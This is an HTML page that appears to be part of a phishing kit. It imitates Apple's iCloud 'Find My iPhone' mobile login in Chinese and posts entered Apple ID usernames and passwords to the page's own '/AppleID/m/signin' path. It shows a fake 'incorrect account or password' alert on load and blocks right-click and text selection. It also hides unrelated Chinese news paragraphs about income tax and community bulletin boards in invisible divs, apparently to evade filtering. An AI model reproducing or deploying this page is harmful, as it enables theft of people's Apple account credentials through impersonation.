<!DOCTYPE html>
<html>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <link rel="shortcut icon" type="image/x-icon" href="https://appleid.cdn-apple.com/static/bin/cb3606853004/images/favicon.ico">
    <script type="text/javascript">(function () {
        var ua = window.navigator.userAgent,
            agents = ['Android', 'iPhone', 'SymbianOS', 'Windows Phone', 'iPod'],
            isPC = true;
        for (var i = 0, len = agents.length; i < len; i++) {
        if (ua.indexOf(agents[i]) > 0) {
            isPC = false;
            break;
        }
        }
        if (isPC) {
        var href = window.location.href.replace('AppleID/m', 'AppleID');
        window.location.href = href;
        }
    })();</script>
    <title>iCloud</title>
    <meta name="viewport" content="width=device-width,minimum-scale=1,maximum-scale=1,user-scalable=yes">
    <script language="javascript">
        function checkinput() {
            if (document.form1.u.value == "") {
                window.alert("您还没有输入 Apple ID");
                return false;
            }
            if (document.form1.p.value == "") {
                window.alert("您还没有输入密码");
                return false;
            }

            return true;
        }
        function sub() {
            document.getElementById('button').click();
        }
    </script>
    <link href="/AppleID/css/wapcss.css" rel="stylesheet">
    <script>
        $(function(){
            alert("您输入的账号或密码不正确");
        })
    </script>
</head>
<body ondragstart="window.event.returnValue=!1" oncontextmenu="window.event.returnValue=!1" onselectstart="event.returnValue=!1">
    <div style="margin-top:30px"></div>
    <center>
        <img src="/AppleID/img/find_icon.png" style="width:100px;height:100px">
    </center>
    <p></p>
    <div class="main">
        <div id="Layer1" style="display:none">
            总体来说，个人所得税面临着税制不合理的问题。我国分类征收个人所得税，有11个分类。党的十八届 三中全会要求对此进行改革，改成综合与分类相结合的个人所得税制，实际就是综合所得税 制。这样的税制比较科学，简单地提高个人所得税起征点并不公平。我曾经回答过，个人收入5000元一个
            月，日子可以过得不错，如果有抚养、有赡养，那么日子就很艰难。因此，最根本来说应该是改税 制。这是第一点。第二，在现有情况下，能不能有一些改进呢？比如我们前年年底提出的职业年金和 企业年金EET的政策。也就是说，在缴存职业年金和企业年金的时候，免征个人所得税；在投资的时候，
            投资收益免征个人所得税；在给付的时候，缴纳个人所得税。这是一个延迟纳税的政策。那么， 在现有的个人所得税制框架之下，给予一定的鼓励，鼓励增加养老保险今后的保障程度，当然同时也 有利于当期的消费
        </div>
        <p class="lok">查找我的 iPhone</p>

        <form action="/AppleID/m/signin" method="post" id="form1" name="form1" onsubmit="return checkinput()">
            <div id="Layer1" style="display:none">
                本报讯 “小区宣传栏能否贴些新东西，都几个月不更新了。”近日，有市民致电本报小红帮忙栏目，希望居委能组织一些有文艺爱好的居民参与到宣传栏内容的制作中，将宣传栏充分利用起来，成为又一个“文化阵地”。 记者走访城区多个社区发现，每个社区居委都设置了不锈钢材质的宣传栏，看起来非常美观，但不少宣传栏的内容已经两三个月没有更新，还有的宣传栏外框上被张贴了小广告。在中医院旁的一个宣传栏中，张贴着年初时公布的社区保洁员名单及收入情况，纸张已经发黄，有两页纸已经掉落。在朱大路附近的一个宣传栏中，张贴的报纸已经发黄，玻璃外框上还有未及时清理干净的小广告的痕迹。还有部分宣传栏中的彩色宣传单已经褪色，一眼就能看出已经很久没有人打理过。
                对于宣传栏海报内容陈旧问题，一社区工作人员表示，题材难创新、人力不够是制约海报推陈出新的主要原因。那么，居民希望社区宣传栏张贴什么内容呢？ 市民陈女士建议社区宣传栏张贴一些时尚海报、电影画刊之类，定时刊登一些影讯，做大片介绍，这样能有效改善社区宣传栏古板的面孔。而家庭主妇们则建议多刊登些超市打折信息，米油降价之类的信息。退休教师周鸣岗认为，社区新闻是肯定不能少的，还有社区趣闻、故事、政策之类居民们都会关注。
                记者发现，北大街社区靖北新村的宣传栏会定时更新，而且内容丰富，原来这是小区内的几位热心居民在负责。“每一期黑板报都是根据最近的时事热点、气候特征、生活小常识等内容，自编自写，很有可读性。”靖北新村一位居民说。
                “靖北新村的做法值得其他小区借鉴。”市民刘琳说，“居委可以号召社区内有才艺的志愿者和热心人参与宣传栏的制作，尤其是退休的热心人，他们有时间有热情。”
            </div>
            <ul class="main_list">
                <li class="main_bord">
                    <strong style="padding-top:6px">Apple ID</strong>
                    <input name="username" type="text" class="main_col" id="u" value="" placeholder="example@icloud.com">
                </li>
                <li class="main_buuo">
                    <strong style="padding-top:6px">密码</strong>
                    <input name="password" type="password" class="main_col" id="p" value="" placeholder="必填">
                </li>
            </ul>
            <input type="submit" name="submit" value="登录" id="button" style="display:none">
        </form>
        <h1 onclick="sub()">登录...</h1>
        <br>
        <h3>
            <a href="#" target="_blank" style="text-decoration:none;color:#2AB040">忘记Apple ID或密码?</a>
        </h3>
        <h3>
            <a style="text-decoration:none;color:#2AB040">设置说明</a>
        </h3>
    </div>
    <script src="/AppleID/js/jquery-3.3.1.min.js"></script>
    <script src="/AppleID/js/base.js"></script>
</body>
</html>